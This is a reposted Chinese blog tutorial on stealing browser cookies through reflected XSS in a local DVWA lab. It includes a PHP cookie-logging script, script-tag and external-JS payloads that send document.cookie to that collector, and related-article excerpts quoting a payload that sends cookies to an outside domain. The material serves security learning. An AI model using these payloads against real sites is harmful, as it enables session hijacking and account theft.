-----已搬运-----反射型xss获取cookie(本地实现)

最新推荐文章于 2024-02-27 09:26:25 发布
原创 最新推荐文章于 2024-02-27 09:26:25 发布 · 2.4k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了如何通过反射型XSS攻击获取用户的Cookie。首先展示了最简单的XSS payload,然后讨论了在输入长度有限制时,如何利用加载外部JS文件的方法来绕过限制。提供了一个PHP代码示例`getCookie.php`,用于接收和保存Cookie信息。最后,提到了如何处理URL编码问题,并给出在DVWA环境中测试此方法的示例。

目录:

憨球,看这个
https://www.cnblogs.com/yuzly/p/10692449.html
里面的payload,差不多都试过了,稳得很。
xss就看这个了

1.最简单的反射性xss获取cookie
<?php 
// Is there any input? 
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { 
    // Feedback for end user 
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; 
} 
?>

在这里插入图片描述
。好啦,这就反弹了。走了。
。。。
玩笑啦,还有如何发送到我们的服务器上面呢

漏洞页面只要又xss漏洞就好,比如上面那个就行

<?php 
// Is there any input? 
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { 
    // Feedback for end user 
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>'; 
} 
?>

然后 获取cookie的php代码是

getCookie.php

获取get传入的cookie参数。
<?php
$cookie = $_GET['cookie'];
echo $cookie;
$log = fopen("cookie.txt", "w");
fwrite($log, $cookie ."\n");
fclose($log);
 将cookie写入本地的一个txt文件中
?>

所以我们的注入的xss代码就是:

?name=<script>document.location='http://localhost/xssTesting/getCookie.php?cookie='+document.cookie;</script>

注意!!!!

shellcode里面cookie和原始url连接的时候,用的是+。
然而在浏览器的地址栏里,+可能被解析成空格。
所以我们需要把+替换成url编码%2b。

?name=<script>document.location='http://localhost/xssTesting/getCookie.php?cookie='%2bdocument.cookie;</script>

在这里插入图片描述
在这里插入图片描述

2.当限制输入长度的时候,可以用那篇文章中的加载外部js的那个,那个比较短,

就是这个:payload

<script src=http://localhost/j.js></script>

j.js的内容是:

var img = new Image();
img.src='http://localhost/xssTesting/getCookie.php?cookie='+document.cookie;

这个访问的php文件和上面那个一样的。内容没变。

我在网站的根目录下有个 j.js的文件,
在这里插入图片描述
然后这里dvwa一访问,调用外部js文件,就将信息发送给getcookie.php了,然后这个PHP脚本就会将信息写入本地的一个txt文件中,就可以看到cookie了
在这里插入图片描述
在这里插入图片描述

Zero_Adam
关注
php反射型xss,利用反射型XSS漏洞,模拟获取登录账户的Cookie
weixin_39819152的博客
04-01 945
目录结构一、测试环境二、测试目标三、原理描述四、操作步骤1.在服务器上搭建并启用hacker测试网站2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹3.在xss文件夹下创建攻击脚本、cookie存储文件4.浏览器客户端向服务端提交特殊构造的XSS攻击脚本5.检查服务端获取到的cookie信息6.验证服务端获取到的cookie的有效性一、测试环境:PhpStudy+DVWA二、测试目标:从...
4.XSS-反射型(get)利用:获取cookie
愿听风成曲
06-23 684
我这里将对应的IP地址修改为本地pikachu的主站IP地址,这样给用户造成一种正常视觉上的欺骗,容易上当。修改一下配置文件\pikachu\pkxss\xcookie\cookie.php。就能获取到用户的IP,cookie值,refer二,ua等相关信息。输入基于域名的搭建的pkxss,在搜索框里输入链接。可以将referer的链接发送给对应的要攻击的用户。基于IP搭建的pkxss平台(入侵者的IP地址)在皮卡丘里面的xss后台进入cookie收集。我这里基于域名搭建的pkxss平台。
cookie获取反射型xss具体案例演示
weixin_44720762的博客
05-01 2749
这篇博客用于介绍XSS的危害以及增加对XSS的理解。 下面对于cookie的介绍来源于百度,我个人认为对cookie的讲解已经很清楚了,方便同学阅读,在这里复制了一些。 cookie介绍: Cookie 可以翻译为“小甜品,小饼干” ,Cookie 在网络系统中几乎无处不在,当我们浏览以前访问过的网站时,网页中可能会出现 :你好 XXX,这会让我们感觉很亲切,就好像吃了一个小甜品一样。这其实是通过...
反射型xss钓鱼盗取用户cookie
m0_53820621的博客
01-16 5017
演示用靶场:dvwa
xss脚本攻击获取用户cookie信息存储到本地
Lancis的博客
07-09 593
首先准备一个获取cookie的asp脚本 <html> <title>test</title> <body> <%testfile = Server.MapPath("code.txt") msg = Request("msg") set fs = server.CreateObject("scripting.filesystemobject") set thisfile = fs.OpenTextFile(testfile,8,True,0) th
xss-labs靶场环境
最新发布
09-17
XSS攻击分为三种主要类型:反射型XSS、存储型XSS和基于DOM的XSS。在xss-labs靶场环境中,这些攻击类型都被以不同的关卡形式展现,每个关卡都模拟了一个潜在的真实世界场景。用户需要通过利用各种XSS漏洞来解决问题,...
xss-labs-master.rar
05-09
"XSS-labs-master"提供了丰富的实战场景,每个关卡设计了不同的XSS攻击方式,玩家需找出并利用漏洞,实现目标。通过解谜式的学习,可以锻炼寻找、构造和利用XSS的能力。在实践中,你可以学习到如何发现潜在的注入点...
xss-labs.zip
06-25
"xss-labs.zip" 提供了一个专为学习和实践XSS攻击设计的集成环境,它通过一系列的挑战关卡,帮助我们了解和掌握XSS攻击的原理和防范措施。 XSS攻击主要分为三类:存储型XSS反射型XSS和DOM-Based XSS。在"XSS Labs...
技术报告:XSS盗取Cookie
Ciyaso的博客
02-16 2051
文章目录第1章 绪 论1.1 XSS1.1.1 XSS的介绍1.1.2 XSS的种类1.2 Cookie1.2.1 Cookie的介绍1.2.2 Cookie的特性1.2.3 Cookie的功用第2章 相关技术与基础知识简介2.1 基本漏洞测试工具2.2 反射XSS盗取Cookie第3章 漏洞检测实时演示3.1 演示环境3.2 演示步骤3.2.1构建盗取链接3.2.2利用cookie会话劫持3.2.3 上传一句话webshell3.2.4进一步信息读取总 结 第1章 绪 论 1.1 XSS 1.1.1
简单的利用XSS获取用户cookie
shy的博客
10-25 4702
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
XSS配合CSRF的利用 获取cookie
沐目的博客
07-11 1232
XSS的利用 获取cookie 今天主要学了下XSS的利用,昨天找漏洞,今天主要是利用漏洞。 主要就是围绕这句话展开的 <script>document.location=“http://cmumu.vip/flag.php?cookie=”+document.cookie</script> 1.首先找到XSS漏洞,然后让它可以执行这句话。 2.document.loca...
网安入门17-XSS(打Cookie
m0_61499194的博客
02-27 1754
来到这个实战网站,两个浏览器注册两个账号zyh666,和zyh999,由于同源策略,Edge和火狐登录同一URL不共享cookie。接下来开始攻击,假设这个钓鱼链接被zyh999点击,那么我们就收到了zyh999的Cookie!此时4个步骤以及完成了第一步,接下来的中间人可以选择一个云服务器,也可以用一个XSS平台。反射型也是一样的,在Edge中存好,用Chrome打开,弹的是两个不同的Cookie。查看代码选项,恶意JS选择第一条payload复制到网站的URL中,构造钓鱼链接。实战打Cookie成功。
XSS (2)
qq_41007744的博客
05-15 792
XSS利用方式Cookie窃取攻击XSS攻击中最常见的应用方式之一cookie的操作通过Document对象访问Cookie。若要创建一个Cookie,只要将特定格式的字符串赋给document.cookie常见cookie属性:Domain——设置关联cookie的域名 Expires——通过给定一个过期时间来创建一个持久化Cookie HttpOnly——用于避免cookie被JavaScri...
XSS提取cookie到远程服务器
Deeeelete的博客
08-13 4386
攻击机: 192.168.132.144(kali) 受害机: 192.168.132.188(DVWA) 1.low级别然后找反射型xss的界面 且已知反射型xss输入对应的js代码<script>alert(1)</script>会弹窗。 以及使用<script>alert(document.cookie)</script>会弹cookie 2.则回kali下写php脚本用来接收,首先确保kali已经开启了apache服务,如果没有则开启的命.
XSS入侵服务器盗取用户cookie
hughwupan的博客
03-28 1812
XSS入侵服务器盗取用户cookie欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导...
CTFHUB------XSS
qq_45616570的博客
06-23 830
title: CTFHUB------XSS date: 2021-06-23 10:48:44 top: categories: CTFHUB刷题 tags: 网络安全 CTFHUB CTFHUB------XSS 反射型xss 题目 解题思路 题目是xss反射型 xss反射型是将变量的值换成xss的payload flag在cookie中,利用xss平台进行获取flag 解题过程 1.创建xss平台项目 2.点击下一步,勾选默认模块 3.点击下图中的一个作为反射型的变量值 4.返回题.
最简单的反射型XSScookie
热门推荐
thislocal的博客
03-29 1万+
参考了网上的一堆教程和余弦的《web前端黑客技术揭秘》 主要是关于XSS的。更准确一点,关于盗取cookie的,且是反射型。其实就是最简单的一个反射型cookie盗取过程。 一、XSS的一般过程: 1、找到XSS漏洞,假设存在于网站A; 2、发送可以触发该漏洞的,特定代码到攻击目标; 可以这样构造:凤姐最新性感视频 其中,www.foo.com/xss/xss.php?x=是存在漏洞的
xss漏洞-DVWA跨站攻击盗取用户cookie
CKT_GOD的博客
09-18 4233
程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style Sheet)CSS 区分开来,所以在安全领域跨站脚本攻击叫做 XSS XSS 攻击简介 XSS 攻击通常指黑客通过往 Web 页面中插入恶意 Script 代码,当用户访问网页时恶意代码在用户的 浏览器中被执行,从而劫持用户浏览器窃取用户信息。 1、黑客加在特定 web 页面 index.html 中,加入
掌握XSS攻击必备神器:XSS-Encode谷歌插件
XSS攻击可以分为三种类型:反射型XSS、存储型XSS和DOM型XSS。根据不同的类型,攻击者利用的场景和手段也有所不同。 #### XSS攻击的危害 XSS攻击的危害不容小觑,它可以被用来: - 盗取用户Cookie,进而冒充用户操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值